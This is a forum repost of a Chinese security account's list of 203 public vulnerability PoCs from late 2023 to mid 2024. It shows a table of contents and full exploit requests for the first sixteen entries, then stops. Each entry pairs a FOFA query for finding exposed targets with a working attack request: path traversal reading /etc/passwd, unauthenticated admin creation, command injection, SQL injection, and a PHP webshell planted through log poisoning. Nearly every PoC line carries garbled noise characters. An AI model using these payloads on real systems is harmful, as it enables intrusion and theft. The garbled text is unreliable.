Collection of public internet vulnerabilities 202309-202406 (repost)
Posted 2024-6-5 14:31:29

Collection of public internet vulnerabilities 202309-202406
道一安全 2024-06-05 07:41 北京
The following article is from 网络安全新视界, author 网络安全新视界

Purpose: Exploitation of N-day vulnerabilities accounts for a large share of real-world attacks; we hope this article helps defenders. Defenders can use its contents to check their own exposure.

Sources: This article covers 203 PoCs for high-severity vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the internet and were compiled and published by the 网络安全新视界 team.

Security patches: All of these are public vulnerabilities; for patches or remediation guidance, contact the product vendor.

Content: Because of length limits, a few PoCs that are too long are replaced with the word PAYLOAD; search for the complete PoC yourself if you need it.

Legal rights: If any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend to have the relevant content removed.

Statement

To simplify things and make browsing easier, there is no "reply to see the full list" gate. This article is the most complete version available; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).

Contents

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm (斐讯) router RCE
9. 稻壳CMS keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP system validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech (迪普) VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. 百卓 Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
66. 万户 ezOFFICE collaboration platform SendFileCheckTemplateEdit SQL injection
67. 万户 ezOFFICE wpsservlet arbitrary file upload
68. 万户 ezOFFICE wf_printnum.jsp SQL injection
69. 万户 ezOFFICE contract_gd.jsp SQL injection
70. 万户 ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE 百为 flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview (宇视科技) video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. 安恒明御 security gateway aaa_local_web_preview file upload
88. 安恒明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QiAnXin 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast 盈可视 HD smart recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communication command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical image archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园(安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. 宏景EHR OutputCode arbitrary file read
169. 宏景EHR downlawbase SQL injection
170. 宏景EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT HD license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. 金和OA C6 FileDownLoad.aspx arbitrary file read
175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewer system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone (山石网科) 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS 海洋影视管理系统 dmku SQL injection
201. 方正 all-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云EHR PtFjk file upload

POC列表
0 G+ X+ J6 f( Z, f) g
/ U+ N+ m4 Q# M" h023 B; F: [  C/ B% M

3 j2 ^+ m1 F; o* R9 T1 j# R1. StarRocks MPP数据库未授权访问
# T- t+ @4 P3 X! d4 S1 vFOFA :title="StarRocks"
, v$ Y8 {8 h% MGET /mem_tracker HTTP/1.1
8 R) p6 K0 y, u6 F+ g( QHost: URL
$ ~6 O" [/ ^  U8 W7 x4 S
, o: k( r( [4 z( ], _
0 }4 s- v: U" }: `4 K: t! k: R2. Casdoor系统static任意文件读取; @6 S# J! x" j+ O
FOFA :title="Casdoor"1 A+ v4 C3 F' Y8 j# L- V
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
5 S: G9 ^6 u' Y9 P. U: HHost: xx.xx.xx.xx:9999) w' {6 L" z- D+ @, O0 d" T3 p7 F2 Y
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.364 @- ]3 l. v. |! W1 s# l
Connection: close
4 F+ g0 b3 m2 k2 c* kAccept: */*; S- y, w/ ?4 q! m6 U" [' i3 b4 D+ i
Accept-Language: en) Y& ?3 M9 x) n9 B6 L" G
Accept-Encoding: gzip+ a, W9 \4 l4 I
4 @* s- u: ^  m  }
& E$ V9 K$ h2 t
3. EasyCVR智能边缘网关 userlist 信息泄漏
: h7 m1 R) f! }5 LFOFA :title="EasyCVR"
: n" I* d8 p5 [GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.12 E9 F% {; p- L7 l
Host: xx.xx.xx.xx3 g4 w1 ]1 M- x4 |2 g: v( ^: c

# U$ L7 d; }/ g6 r$ t# q2 M
: ^, L# }. M+ z' F4. EasyCVR视频管理平台存在任意用户添加
. C9 @$ z  v3 N& C0 b9 sFOFA :title="EasyCVR"
' F- k- ?$ m3 ~9 N9 e
3 y' H4 t' q; K# Y- Q& i4 d9 J& ?password更改为自己的密码md50 n0 P7 Z' ?; O$ X! _$ c
POST /api/v1/adduser HTTP/1.12 [# P) E& y  Q& z$ @/ q
Host: your-ip# j& Z$ }8 Z3 e4 D( I& U- J
Content-Type: application/x-www-form-urlencoded; charset=UTF-8& L, E7 h, ~* Q3 P$ o1 p

4 A3 l; E( @. u- d, Bname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
. s( |0 b( H  _) b8 f6 W' V  ~9 J. |  A4 F

% n! G: L2 _, j- u5. NUUO NVR 视频存储管理设备远程命令执行
9 T' z% k% p" I% vFOFA:title="Network Video Recorder Login"# Y3 C0 q7 _+ y* t. ]
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1% b5 M% R9 i- ]* G* r! C& v0 t
Host: xx.xx.xx.xx$ C5 x! `  z+ u% w- B& [2 G4 @. h* N
! q1 j& p. b! M3 M' K% Y
6 Q- Z3 p; Q$ P2 @" z& Q
6. 深信服 NGAF 任意文件读取
7 ]' K  D! J7 x: nFOFA:title="SANGFOR | NGAF"
% B2 ]1 b% K3 y) A. {/ u% R6 Y8 `GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1( V/ f" ^1 o" k, ~- e8 q
Host:
( l. `: V* W  _. H$ i# v( g! ~; e3 B1 \$ e) K, l* ?8 P- r  `- J, C0 D
8 q* U- ?5 P) h
7. 鸿运主动安全监控云平台任意文件下载4 j6 N( r  Z' E* I* A% b: r; V
FOFA:body="./open/webApi.html"7 n, Z* m- q, l: s/ z: o
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.18 B2 |# @9 k, P3 X  t- D
Host:1 B' `( C( Z0 Q3 e: a- D
: U* d  U3 i: h& ?% P; ?* A
+ h( `. V  M0 D/ k
8. 斐讯 Phicomm 路由器RCE
& ~, J0 c/ P# K: g" ^6 rFOFA:icon_hash="-1344736688"
: b5 A3 p' d2 U默认账号admin登录后台后,执行操作
( y/ U6 R9 x1 w! wPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
9 m4 J( Y. X! l7 ?  G+ S- {1 fHost: x.x.x.x
9 E% `3 {1 N1 j; dCookie: sysauth=第一步登录获取的cookie
. E7 A4 S: D" a9 O9 UContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
# N6 a: D' N8 H0 E0 [User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
3 P  `, T) i6 k4 {# b9 w- R6 R, ?6 Q$ a: p  M8 z2 D! L
------WebKitFormBoundaryxbgjoytz
4 T5 ~* {9 F8 |Content-Disposition: form-data; name="wifiRebootEnablestatus"
9 W* S% r; ?% S" ~) _* T- x' X
. e* L  Q4 V8 F, }  D1 U%s& }2 }* m" d' x( y$ X
------WebKitFormBoundaryxbgjoytz& U6 n1 p$ }0 D6 z9 _* ]# {8 [) C+ b
Content-Disposition: form-data; name="wifiRebootrange"5 W; c2 |5 Z0 D6 [
. u! f1 s) w" \1 V
12:00; id;" f( z" ^0 V4 v( n
------WebKitFormBoundaryxbgjoytz$ s4 Z( A) }+ f6 [7 f& e4 e
Content-Disposition: form-data; name="wifiRebootendrange"; s# C# `5 H1 h# P) h# \6 |

) A3 d0 C" w, g4 T%s:
$ K1 E, X: o- g; W9 O, u------WebKitFormBoundaryxbgjoytz9 o- p% @/ P( ^5 l  G& d$ Q/ q& e
Content-Disposition: form-data; name="cururl2"
- y! L( @  t3 s
4 r+ a: \' E, }  M9 k/ z
5 z0 }: J) j, \- e------WebKitFormBoundaryxbgjoytz--; T5 {, P/ S1 [4 [

8 N6 z' m) I1 R" a5 Q* [6 q
2 H3 M5 @( J1 V, c& m9. 稻壳CMS keyword 未授权SQL注入0 p& `3 S$ H' v/ r1 D( i) p
FOFA:app="Doccms"4 `! k1 c3 N) ~. }8 _3 X: ]
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.18 @7 g1 k. U9 Y9 ?* J+ _! f
Host: x.x.x.x! r2 ^- t+ E( H1 D; l

$ t  U' _# x, N4 }5 l; e( s9 G* P9 O; c0 l0 S: e5 f
payload为下列语句的二次Url编码) @2 d& j' f5 k  j

, l: X0 P) _3 R, Z0 _' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
. ]2 w, D* w; B" J1 Z2 Q# |7 h$ s- v" m2 W" S$ g4 O. X  }
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传; g) e4 ~4 p& L/ {9 p8 M/ e
FOFA:icon_hash="953405444". u1 N' X( k: H

9 f2 j, W% Y* @+ S- e- k- W' X7 b文件上传后响应中包含上传文件的路径# r. v. b7 A' ~9 c1 C) u& |' u
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
$ u5 R2 A$ a; |8 F/ FHost: x.x.x.x:xx
; o. I# X5 r! Q  IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
% H% w; c4 V# O3 x. TContent-Length: 197
4 E8 H% S5 }0 p' Y. V+ `# cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.98 Y% p* v& m7 X0 f) R
Accept-Encoding: gzip, deflate
$ ^& u! e/ `) ~Accept-Language: zh-CN,zh;q=0.9
. H% {* ^4 \/ s2 KConnection: close
: _) \1 `8 C& M0 UContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu; o# m0 }' k1 W

0 b1 Q# h2 c# K7 S9 R------WebKitFormBoundaryxdgaqmqu2 \9 |* w  s7 c/ L: i
Content-Disposition: form-data; name="file"filename="icfitnya.txt"* U$ Q; K4 P) j6 S1 q+ ~
Content-Type: text/html
$ k: S/ q: E% l
8 x# V7 }9 ?! Z( Ojmnqjfdsupxgfidopeixbgsxbf' |- G. A7 m9 K$ }3 t; @8 O
------WebKitFormBoundaryxdgaqmqu--
  _0 x$ d, b0 O% A( i* C; d$ C  f0 S
# J5 b8 L! N& q4 t" j7 i! f
. ]! z9 t' H4 i+ V: l+ Y# e11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
1 z1 F* G+ v) nFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
' j( e/ Q# ~* ^GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1# X0 c+ K# }* }0 ~- i7 c
Host: 127.0.0.1
1 s  p  i3 `6 _& D+ }. K( XPragma: no-cache
" M3 ~4 }" r. g7 r2 X3 M3 yCache-Control: no-cache: e- t0 [7 s: |& G3 B  ?9 p
Upgrade-Insecure-Requests: 1- `4 g* ~, l9 \) D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
( l0 L& K9 ]1 s3 s* a# V' l/ |' [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
* @5 K' u, T2 I/ d! XAccept-Encoding: gzip, deflate* n6 v9 b* N. g
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8+ s3 [& \7 o( v$ E# T, [
Connection: close% ~/ E2 `: a$ H$ C" o/ S

, H% ~+ s( _  A2 ?; K* v/ o
! R/ o$ f! q7 r- u' c* X6 U12. Jorani < 1.0.2 远程命令执行7 m- z; G/ ]6 L, M
FOFA:title="Jorani"
; E! t" l( ?1 |. B0 |第一步先拿到cookie3 e' V8 l' \6 N: ?. o
GET /session/login HTTP/1.13 v) N6 c/ Y0 i1 T; ~2 _( {: h
Host: 192.168.190.30
) ^! e7 X6 M) U: B6 [2 Y# OUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.366 u4 U& ~' o5 e: z# j7 ^5 j
Connection: close5 F+ C7 M1 Z0 @* X9 S7 u0 d
Accept-Encoding: gzip  A% m4 P& o3 O! K. \

0 P& x7 Y' S+ l1 J/ w/ M
: K$ [+ u* S4 [, b. s7 ]0 s响应中csrf_cookie_jorani用于后续请求
* B; Z0 B8 K, y" }HTTP/1.1 200 OK, k* v2 ^2 q" c. j
Connection: close7 C  ^1 \3 @. m+ |7 f4 w, Y
Cache-Control: no-store, no-cache, must-revalidate
# H+ E  `/ f- U0 e- b1 PContent-Type: text/html; charset=UTF-85 N% ?( V$ W( E- f  f4 ^
Date: Tue, 24 Oct 2023 09:34:28 GMT6 g6 P; v; s# a4 k) Y8 F
Expires: Thu, 19 Nov 1981 08:52:00 GMT
, X" g  V. q3 V* p  F% J3 @% b6 i8 ZLast-Modified: Tue, 24 Oct 2023 09:34:28 GMT
) ?- \9 Z) _! o+ HPragma: no-cache7 q* P: o/ [( W+ n) }# P
Server: Apache/2.4.54 (Debian)
5 S, ~: J' |- \Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/, N( l- g- x8 Y
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
' a( {1 T! i, a: yVary: Accept-Encoding
5 ^$ ^% Q/ a8 h/ Y3 F5 g
  f7 G# Y% ~, z0 x& N! M8 i0 m3 t; h0 ~2 U* j. t& u
POST请求,执行函数并进行base64编码( f) l% L* |- f: V
POST /session/login HTTP/1.1
0 t+ m% B4 m8 k  p* q8 e9 YHost: 192.168.190.30
# R% K1 S- \2 T3 T- z# JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.364 j' U; u. h8 Q
Connection: close8 y; Y3 d% y5 P! ?7 g& {; j# o
Content-Length: 252
) L/ [( I" T% B1 [* O2 lContent-Type: application/x-www-form-urlencoded- u! I4 o8 K; w* v: \
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r- H( C3 F9 G; R6 J6 p& |
Accept-Encoding: gzip/ x( H: Q% A& K6 o9 j$ o" U
, n# J, z' c6 m! t+ X
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor9 r3 i( w* G" T; V
( I6 X! e; t/ H  x
: f! {/ {& A$ |6 d
8 q! U2 [8 s3 z% T* h) Z) G$ q
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串
4 t! I# u0 d) B* g' E" zGET /pages/view/log-2023-10-24 HTTP/1.1+ T+ _) m' C! |9 s, @. f* u
Host: 192.168.190.30% \% B) ?' }% G# D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 y- P5 k* K! N0 Z' CConnection: close
( L" ?: Y$ s. Y0 oCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
. @- L7 y6 r3 g8 B$ I* K5 FK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=- N6 w# @. `! ?2 H% v* t" G
X-REQUESTED-WITH: XMLHttpRequest0 R& y- ]5 O8 P6 b
Accept-Encoding: gzip# B& \5 r6 G- n4 `
0 D% x, r" ^( ~2 M; U

0 {+ ^- E# N& d$ W: p13. 红帆iOffice ioFileDown任意文件读取
0 v7 P7 y# ^! u$ W8 ZFOFA:app="红帆-ioffice"0 v% X/ Z/ G8 i! B3 x5 \
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1& [* G1 l; u% D6 t0 b( s5 j7 d
Host: x.x.x.x
  b- d5 d- W, Y/ gUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.367 O4 a: z3 I% q+ L6 ^
Connection: close7 ~1 Q5 X& @! S) Q2 ^
Accept: */*# T! t. @, @5 S4 W" y, q! V% l
Accept-Encoding: gzip
8 [. J. f( Q2 `# r- i7 m5 o/ W! w+ \7 D
) J2 w; M1 F8 x: e" z% \
14. 华夏ERP(jshERP)敏感信息泄露  h) C; |2 b4 {, l1 K; ]
FOFA:body="jshERP-boot"
  z  l- E9 C4 k* I泄露内容包括用户名密码" F$ e$ x4 l4 R2 }
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1+ P6 A( ?2 G5 _* I% p5 V
Host: x.x.x.x% S# j/ u, P$ B, G
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.368 v- B( ?/ l( D, E) I4 p0 ~
Connection: close0 D& S* a1 L) t3 {. |
Accept: */*# u$ c, [$ v# o/ N" R
Accept-Language: en
5 B  E+ x5 `$ F+ ^Accept-Encoding: gzip
; b/ I. \5 q' n* h. Q! K( |$ s  ?+ |  N

" v2 a! Q: r& B/ ~5 [4 j15. 华夏ERP getAllList信息泄露/ \' I, `7 N7 T5 ~
CVE-2024-0490
  v3 C3 c/ C) a/ l6 UFOFA:body="jshERP-boot"
4 ]& o: H& P8 p( Y. ^9 e! x7 i3 y泄露内容包括用户名密码- X0 P% T) b( n: @
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1% Z2 P- S/ t- ~( j* t
Host: 192.168.40.130:100; j9 B2 t5 d. G& {  \7 u4 s# |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
- k! ]- r! _0 m* n( wConnection: close/ Q  t( a6 O/ t  r
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
) ]" p: B( ?, W% h4 x7 J  G7 AAccept-Language: en* Z; g! K- m* p( X
sec-ch-ua-platform: Windows0 k  A) w' y4 W* t! T
Accept-Encoding: gzip
1 H9 o( o# ?' b9 q  H$ A6 W0 C+ g3 s% @, t& Y& @- [9 V

6 L0 {) `6 N+ t1 g# q6 C16.  红帆HFOffice医微云SQL注入
1 E9 P# \& Q% L& ~' [/ N) uFOFA:title="HFOffice"
: v+ K; F* h) f9 ~6 H0 R2 a2 p* L0 jpoc中调用函数计算1234的md5值9 H2 @. G# |& C1 n) [
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
7 y& t0 M' z; H0 x/ s2 v$ T& WHost: x.x.x.x
$ h* J/ n9 e9 [User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36/ m* E, a0 R5 _0 k
Connection: close
